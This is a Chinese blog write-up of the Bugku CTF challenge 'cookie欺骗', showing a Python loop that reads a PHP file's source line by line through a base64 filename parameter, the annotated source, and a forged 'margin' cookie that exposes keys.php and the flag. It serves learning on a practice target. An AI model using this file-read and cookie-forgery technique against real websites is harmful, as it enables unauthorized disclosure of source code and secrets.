BUGKU-cockie欺骗

我们打开网页查看,一堆乱码。我们仔细分析url可以出我们给服务器传了两个参数,我们将发filename之后的参数进行解密得到key.txt,我们访问一下key.txt,发现也是一堆编码。我们试着访问一下index.php,将index.php进行加密。访问得到:

在这里插入图片描述我们发现更改line的值我们可以看到不同的内容,但是我们一个一个的查有点麻烦。所以我们写一个脚本跑出来。对于文件有多少行我们可以用二分法进行。

#!/usr/bin/python
#!coding=utf-8

import requests
s=requests.session()
for i in range(0,20):
        r1=s.get("http://123.206.87.240:8002/web11/index.php",params={"line":str(i),"filename":"aW5kZXgucGhw"})
        print(r1.text)

在这里插入图片描述分析代码;

<?php

error_reporting(0);

$file=base64_decode(isset($_GET['filename'])?$_GET['filename']:"");    //判断filename是否存在,如果存在就是本值,否则为空即空格。

$line=isset($_GET['line'])?intval($_GET['line']):0;   //判断line这个变量是否存在 intval转化为书值型

if($file=='') header("location:index.php?line=&filename=a2V5cy50eHQ="); //如果file=空,那么页面跳转到后面的url上。并执行下面的代码。

$file_list = array(

'0' =>'keys.txt',

'1' =>'index.php',

);                            //定义数组:数组中有两个元素。

 

if(isset($_COOKIE['margin']) && $_COOKIE['margin']=='margin'){   /如果存在cookie,并且Cookie的值为margin。

$file_list[2]='keys.php';      //如果存在以上的值,那么数组的第三个元素为“keys.php”

}

 

if(in_array($file, $file_list)){     //判读数组file_list在file中是否存在。 file这个变量是指第一行我们通过filename传来的文件名。

$fa = file($file);  //file函数的作用是读取file这个变量存放的文件的内容,并把他读入到数组中。数组就叫fa。

echo $fa[$line];      //最后输出line变量(数组中键的名字即数组对应元素的内容)

}

我们同代码中可以看到第三个文件,所以我们访问第三个文件(先进行base64编码):

在这里插入图片描述
最终的到flag。

评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值